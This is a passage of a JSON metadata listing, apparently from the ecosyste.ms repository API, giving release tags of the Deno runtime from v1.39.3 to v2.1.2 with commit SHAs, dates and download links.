82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url"